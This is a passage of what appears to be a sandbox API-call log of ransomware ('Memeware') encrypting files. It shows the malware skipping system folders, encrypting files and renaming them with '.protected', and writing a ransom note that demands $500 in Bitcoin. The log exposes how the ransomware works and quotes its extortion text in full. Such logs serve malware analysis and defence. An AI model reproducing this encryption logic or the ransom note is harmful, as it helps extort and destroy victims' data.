lpFindFileData=0x295e7d0) returned 0x47ba90 [0093.650] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.650] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.650] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.650] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.650] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.650] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\.") returned 67 [0093.650] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.650] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0093.650] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0093.650] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.650] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.650] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\." (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.650] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.651] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.651] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.651] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.651] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.651] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.651] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\..") returned 68 [0093.651] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.651] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.651] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0093.651] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0093.651] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.651] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.651] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\.." (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.651] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.651] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0093.651] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0093.651] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0093.651] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0093.652] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0093.652] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini") returned 77 [0093.652] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0093.652] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0093.652] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.652] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.652] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0093.652] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini") returned 77 [0093.652] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0093.652] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini") returned 77 [0093.652] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0093.652] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini") returned 77 [0093.652] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0093.653] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x43, lpOverlapped=0x0) returned 1 [0093.653] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.653] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x43, lpOverlapped=0x0) returned 1 [0093.653] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.653] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0093.654] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0093.654] CloseHandle (hObject=0x150) returned 1 [0093.654] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini.protected") returned 87 [0093.654] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\desktop.ini.protected")) returned 1 [0093.654] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.654] lstrcmpiW (lpString1="fwlink[1]", lpString2="Windows") returned -1 [0093.654] lstrcmpiW (lpString1="fwlink[1]", lpString2="Program Files") returned -1 [0093.654] lstrcmpiW (lpString1="fwlink[1]", lpString2="Program Files (x86)") returned -1 [0093.654] lstrcmpiW (lpString1="fwlink[1]", lpString2="$Recycle.bin") returned 1 [0093.654] lstrcmpiW (lpString1="fwlink[1]", lpString2="System Volume Information") returned -1 [0093.654] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1]") returned 75 [0093.655] StrStrIW (lpFirst="fwlink[1]", lpSrch=".protected") returned 0x0 [0093.655] lstrcmpW (lpString1="fwlink[1]", lpString2="RESTORE_FILES.txt") returned -1 [0093.655] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.655] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.655] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1]" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\fwlink[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0093.656] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1]") returned 75 [0093.656] StrStrW (lpFirst="fwlink[1]", lpSrch=".txt") returned 0x0 [0093.656] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1]") returned 75 [0093.656] StrStrW (lpFirst="fwlink[1]", lpSrch=".rar") returned 0x0 [0093.656] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1]") returned 75 [0093.656] StrStrW (lpFirst="fwlink[1]", lpSrch=".zip") returned 0x0 [0093.656] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0093.656] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.656] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0093.656] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.656] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0093.657] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0093.657] CloseHandle (hObject=0x150) returned 1 [0093.657] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1].protected") returned 85 [0093.657] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1]" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\fwlink[1]"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1].protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\fwlink[1].protected")) returned 1 [0093.657] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0093.657] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0093.658] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\RESTORE_FILES.txt") returned 83 [0093.658] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0093.659] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0093.659] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0093.659] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0093.659] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0093.659] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0093.660] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0093.660] CloseHandle (hObject=0x14c) returned 1 [0093.660] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.660] lstrcmpiW (lpString1="D68G7BIJ", lpString2="Windows") returned -1 [0093.660] lstrcmpiW (lpString1="D68G7BIJ", lpString2="Program Files") returned -1 [0093.660] lstrcmpiW (lpString1="D68G7BIJ", lpString2="Program Files (x86)") returned -1 [0093.660] lstrcmpiW (lpString1="D68G7BIJ", lpString2="$Recycle.bin") returned 1 [0093.660] lstrcmpiW (lpString1="D68G7BIJ", lpString2="System Volume Information") returned -1 [0093.660] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ") returned 65 [0093.660] lstrcmpW (lpString1="D68G7BIJ", lpString2=".") returned 1 [0093.660] lstrcmpW (lpString1="D68G7BIJ", lpString2="..") returned 1 [0093.661] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\*") returned 67 [0093.661] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0093.661] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.661] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.661] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.661] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.661] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.661] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\.") returned 67 [0093.661] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.661] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0093.661] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0093.661] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.661] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.661] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\." (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.661] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.661] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.661] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.662] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.662] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.662] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.662] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\..") returned 68 [0093.662] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.662] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.662] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0093.662] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0093.662] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.662] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.662] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\.." (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.662] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.662] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0093.662] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0093.662] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0093.662] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0093.662] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0093.662] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini") returned 77 [0093.662] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0093.662] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0093.662] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.662] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.662] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0093.663] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini") returned 77 [0093.663] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0093.666] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini") returned 77 [0093.666] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0093.666] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini") returned 77 [0093.666] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0093.667] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x43, lpOverlapped=0x0) returned 1 [0093.667] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.667] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x43, lpOverlapped=0x0) returned 1 [0093.667] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.668] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0093.668] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0093.668] CloseHandle (hObject=0x150) returned 1 [0093.668] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini.protected") returned 87 [0093.673] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\desktop.ini.protected")) returned 1 [0093.673] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.673] lstrcmpiW (lpString1="fwlink[1]", lpString2="Windows") returned -1 [0093.673] lstrcmpiW (lpString1="fwlink[1]", lpString2="Program Files") returned -1 [0093.673] lstrcmpiW (lpString1="fwlink[1]", lpString2="Program Files (x86)") returned -1 [0093.673] lstrcmpiW (lpString1="fwlink[1]", lpString2="$Recycle.bin") returned 1 [0093.673] lstrcmpiW (lpString1="fwlink[1]", lpString2="System Volume Information") returned -1 [0093.674] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1]") returned 75 [0093.674] StrStrIW (lpFirst="fwlink[1]", lpSrch=".protected") returned 0x0 [0093.674] lstrcmpW (lpString1="fwlink[1]", lpString2="RESTORE_FILES.txt") returned -1 [0093.674] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.674] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, 